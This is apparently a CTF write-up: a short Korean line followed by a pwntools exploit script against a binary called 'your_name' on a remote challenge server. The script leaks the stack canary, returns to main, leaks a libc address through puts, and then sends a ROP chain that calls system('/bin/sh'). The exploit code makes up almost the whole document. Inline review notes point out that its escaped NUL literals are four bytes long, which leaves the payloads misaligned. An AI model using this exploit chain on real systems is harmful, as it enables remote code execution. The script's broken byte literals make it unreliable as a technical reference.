Ret2Main 후 Canary-Leak 이후 ROP 하면 된다.


from pwn import *

# Target connection and the two binaries the exploit depends on.
# The live run talks to the remote challenge service; the commented-out
# line is the local-process alternative for testing.
p = remote('server.sqli.kr',30003)
#p = process('./your_name')
# ./libc.so.6 is only used for symbol *offsets* (see the libc_base arithmetic
# below), so it must be the exact libc build the remote program is running
# with — any other build silently yields wrong addresses.
e = ELF('./your_name')
libc = ELF('./libc.so.6')

# amd64 so that p64() and the ROP helpers produce 8-byte little-endian words.
# 'debug' echoes every byte sent and received; verbose, but it shows exactly
# which stage stops matching the program's prompts.
context.arch = 'amd64'
context.log_level = 'debug'

def slog(name,addr):
    """Log *addr* as a hex value, prefixed with the label *name*.

    Thin wrapper around pwntools' ``success()``; returns whatever it returns.
    """
    message = name + ": " + hex(addr)
    return success(message)

# ROP gadget addresses, hard-coded from the challenge binary.
# Absolute addresses like these only stay valid when the executable is
# loaded at a fixed base (i.e. built without PIE) — this is exactly what
# PIE + ASLR would take away from an attacker. Confirm against the actual
# file before trusting them.
pop_rbp_ret = 0x00000000004006b8          # not referenced further down
pop_rdi_ret = 0x00000000004008d3          # per its name: loads the 1st argument register (rdi)
pop_rsi_pop_r15_ret = 0x00000000004008d1  # per its name: loads rsi, then r15 (used as a filler slot below)

# Stage 1: recover the stack canary.
# 313 bytes are sent while the later payloads treat the buffer as 312 bytes;
# presumably the extra byte clobbers the canary's low byte so the program
# echoes the remaining 7 bytes back (the low byte is assumed to be 0x00,
# which is why a NUL is prepended and only 7 bytes are received).
# Defender's note: this leak needs the program to echo the buffer past its
# intended end; terminating/bounding that echo closes the leak and leaves the
# canary doing its job.
leak_canary = b'A'*313
p.send(leak_canary)

# str here rather than bytes (the rest of the script uses bytes); pwntools
# encodes it, so it matches the same 313 'A's.
p.recvuntil("A"*313)
# NOTE(review): b'\\x00' is FOUR bytes in Python (backslash, 'x', '0', '0'),
# not a single NUL byte — most likely an escaping artefact of the page. As
# written, `canary` is 11 bytes long and every p64()-built payload below is
# shifted by three bytes; the intended literal is a single NUL byte.
canary = (b'\\x00' + p.recv(7))
p.sendlineafter(b'quit? ',b'n')

# Stage 2: leak a libc address, then return to main so the overflow can be
# used a second time with that knowledge ("Ret2Main").
payload = b'A'*312
payload += canary                   # keep the canary intact so the epilogue check passes
# Occupies the 8-byte slot right after the canary (likely the saved rbp —
# TODO confirm); the page does not say what 0x4005d6 is.
payload += p64(0x00000000004005d6)
payload += p64(pop_rdi_ret)
# rdi = address of .bss; the commented-out tail is an unused alternative.
payload += p64(e.bss()) #+ p64(pop_rsi_pop_r15_ret) + p64(e.bss()) + p64(500)
payload += p64(e.plt['puts'])       # puts(<.bss>): whatever is stored there is printed and consumed below as a pointer
payload += p64(e.symbols['main'])   # restart main for the second overflow

p.sendafter(b'name?',payload)
p.sendlineafter(b'?', b'y')

# Stage 3: convert the leaked pointer into a libc base.
# NOTE(review): as with the canary above, b'\\x00\\x00' is 8 bytes here, not
# 2. The intent is evidently to pad the 6 leaked bytes to 8 for
# int.from_bytes(); in the escaped form the value picks up garbage high bytes
# and every address derived below is wrong.
# Also note .strip() removes *any* leading/trailing whitespace byte
# (0x09-0x0d, 0x20), not just the newline — if the pointer happens to start
# or end with one of those, the value is corrupted. A fixed-length read would
# be more robust.
stdout = p.recvline().strip() + b'\\x00\\x00'
# The leaked value is treated as the address of libc's stdout FILE object
# (_IO_2_1_stdout_); subtracting that symbol's offset gives the load base,
# from which system() and a "/bin/sh" string in libc are located. All three
# depend on ./libc.so.6 matching the server's libc exactly.
libc_base = int.from_bytes(stdout, byteorder='little') - libc.symbols['_IO_2_1_stdout_']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))

# gdb.attach(p,'''
#     b*0x0000000000400865
# ''')

# Print the recovered addresses in hex so the leak can be sanity-checked
# (e.g. libc_base should be page-aligned and look like a libc mapping).
slog("stdout", int.from_bytes(stdout, byteorder='little'))
slog("libc_base", libc_base)
slog("system", system)
slog("bin_sh", bin_sh)

# Stage 4: second overflow, now with libc addresses known: system("/bin/sh").
payload = b'A'*312
payload += canary
# Same post-canary slot as in stage 2; 0x400865 is also the address in the
# commented-out gdb breakpoint above, but its role is not named on this page.
payload += p64(0x0000000000400865)
payload += p64(pop_rsi_pop_r15_ret) + p64(0) + p64(0)   # rsi = 0; the second 0 only fills the r15 pop
payload += p64(pop_rdi_ret)
payload += p64(bin_sh)                                  # rdi = "/bin/sh" in libc
payload += p64(system)

# The script ends here; nothing reads back the result of this stage.
p.sendafter(b'name?',payload)